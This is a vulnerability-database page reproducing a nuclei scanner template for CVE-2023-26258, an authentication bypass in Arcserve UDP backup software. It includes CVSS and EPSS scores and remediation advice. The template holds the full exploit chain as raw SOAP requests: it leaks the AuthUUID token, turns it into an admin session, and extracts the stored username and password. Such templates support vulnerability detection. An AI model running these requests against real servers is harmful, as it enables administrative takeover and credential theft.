Lucene search
K

Arcserve UDP <= 9.0.6034 - Authentication Bypass

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Arcserve UDP up to 9.0.6034 allows authentication bypass through a leaked AuthUUID token enabling an admin session.

Related
Refs
Code
id: CVE-2023-26258

info:
  name: Arcserve UDP <= 9.0.6034 - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
  impact: |
    Unauthenticated attackers can bypass authentication by leaking the AuthUUID token, allowing them to execute any administrative task and potentially compromise all backup data managed by Arcserve UDP.
  remediation: |
    Upgrade to Arcserve UDP version 9.1 or later that addresses this authentication bypass vulnerability.
  reference:
    - https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26258
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-26258
    epss-score: 0.38362
    epss-percentile: 0.98379
    cwe-id: CWE-863
    cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: arcserve
    product: udp
    shodan-query: http.favicon.hash:-1889244460
  tags: cve,cve2023,arcserve,auth-bypass,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
          <S:Body>
            <ns2:getVersionInfo
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/"/>
          </S:Body>
        </S:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "ns5:authUUID")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: auth_uuid
        group: 1
        part: body
        internal: true
        regex:
          - '<ns5:authUUID>([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})</ns5:authUUID>'

  - raw:
      - |
        POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "<http://webservice.arcflash.ca.com/IEdgeDashboardService/validateUserByUUIDRequest>"
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
          <S:Body>
            <ns2:validateUserByUUID
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/">
                <arg0>{{auth_uuid}}</arg0>
            </ns2:validateUserByUUID>
          </S:Body>
        </S:Envelope>

      - |
        POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "<http://webservice.arcflash.ca.com/IFlashService_R16_5/getVersionInfoRequest>"
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
          <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
            <S:Body>
              <ns2:getLocalHostAsTrust
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/"
              >
              </ns2:getLocalHostAsTrust>
            </S:Body>
          </S:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains_all(body, "ns5:uuid", "ns5:userName", "ns5:password")'
        condition: and

    extractors:
      - type: regex
        group: 1
        part: body
        regex:
          - '<ns5:userName>(.*?)</ns5:userName>'

      - type: regex
        group: 1
        part: body
        regex:
          - '<ns5:password>(.*?)</ns5:password>'
# digest: 4b0a00483046022100eaaae06c2aba5ca3b87d2b5e4e26310097cac533ee2898b54feddcd634d3607c0221008ca6417639abb49f9dc2c594e9f476637b7d21c40c61199c508fad2129ee8f26:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.38362
SSVC
10